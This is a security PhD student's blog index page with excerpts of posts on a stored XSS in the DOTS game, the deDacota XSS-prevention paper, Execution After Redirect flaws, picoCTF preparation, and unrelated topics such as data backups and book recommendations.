—Stories from a PhD

Musing of a Computer Security PhD Student

Stored XSS in Popular DOTS Mobile Game

| Comments

So you may or may not be familiar with the popular mobile game DOTS. Well, if you haven’t checked it out, I urge you to. It’s a lot of fun, and it’s available on both Android and iOS.

Anyway, while playing this game, I discovered a stored XSS vulnerability in DOTS. Here’s how it came about.

XSS in a Mobile Game?

So, while playing the multiplayer mode of DOTS, I noticed that there was a “Share” feature. This feature allows you to share (or brag about) your scores with a friend. What happens is that the app uploads your scores and names to the web server (I haven’t looked into the exact HTTP request that it makes), gets back a unique URL, then allows you to send this URL to someone.

deDacota: Toward Preventing Server-Side XSS via Automatic Code and Data Separation

| Comments

This post is an overview of the paper deDacota: Toward Preventing Server-Side XSS via Automatic Code and Data Separation which was written as a collaboration between the UC Santa Barbara Seclab and Microsoft Research, by yours truly. I’m very excited to present this work at the 2013 ACM Conference on Computer and Communication Security in Berlin. If you’re there, please say hi! (Also, if you have suggestions of places or things to do in Europe, let me know!)

So, what is deDacota?


deDacota is my attempt to tackle the Cross-Site Scripting (XSS) problem. I know what you’re thinking, there’s been a ton of excellent research on this area. How could this work possibly be new?


Previously, we as a research community have looked at XSS vulnerabilities as a problem of lack of sanitization. Those pesky web developers (I am one, so I can say this) just can’t seem to properly sanitized the untrusted input that is output by their application.

You’d think that after all this time (at least a decade, if not more), the XSS problem would be done and solved. Just sanitize those inputs!

Back That Data Up: A Cautionary Tale

| Comments

This is a true story that recently happened, and I wanted to share/document it here as a reminder to always backup your research data.

Turns out I was so tired after the 24-hour coding blur that was the 2013 iCTF that I didn’t back up the database. Or if I did, I didn’t check it into our SVN repo. Then, to make matters worse, I didn’t make a note to backup the data later.

Simple Bash Function: SSH and Keep Same Directory

| Comments

Here’s a quick Bash function that I whipped up to SSH into a server and keep the same directory. The use case for me is that I have a Dropbox shared between my laptop and server. Sometimes I need to run something (experiment, code, whatever) on the server. It was becoming annoying to ssh and then cd to the correct directory.

I call this function sshere (ssh here):

Feel free to use, steal, or adapt to your needs.

picoCTF Preparations

| Comments

Getting Started

picoCTF is an awesome hacking competition aimed at High School students. The great guys at CMU and PPP are putting on this innovative competition. I had some High School students ask for pointers to prepare for the picoCTF. I invited them to our weekly hacking group and talked about the hacking mindset and basic tools. They amazed me with their knowledge—I was cutting my teeth on TI-83 BASIC programming in math class when I was their age.

What follows are my notes on the lecture I gave and the discussion that we had. I hope other young hackers find these resources useful while preparing for picoCTF.

Hacker Mindset

First and foremost, we need to understand how the hacker thinks. How should you think when you’re trying to break a program?

Some Classic Literature Recommendations

| Comments

Recently, a friend asked me to recommend some classic English books for him. He’s Persian and was born in Iran, so it was fun to give him some of my favorite american books. I decided to put that list here in case you’re looking for a book to read.


One of the funniest books I’ve ever read. About WWII and it’s sad and funny at the same time.

A Confederacy of Dunces

The funniest book I’ve ever read. Captures the spirit of New Orleans and the characters are outlandish. Plus the book was published after the author committed suicide, so the whole book’s got a sad tinge.

Overview of Execution After Redirect Web Application Vulnerabilities

| Comments

Hi all, I’m here to talk about a little known web vulnerability that Bryce Boe already touched on. Execution After Redirects are logic flaws in web applications that can lead to Information Disclosure and Broken Access Controls.

What’s an EAR?

Well, an Execution After Redirect (EAR) flaw is when a developer causes an HTTP redirect to occur, typically via a web framework. The developer assumes that execution stops after the redirect, however, execution continues.

Paper Review: Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications.

| Comments

What is this?

In an effort to improve my writing and analysis skills, I’m going to review papers using less than 500 words. This is my first attempt.


Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications is a paper written by Davide Balzarotti et. al., and was published at the IEEE Symposium on Security and Privacy in 2008.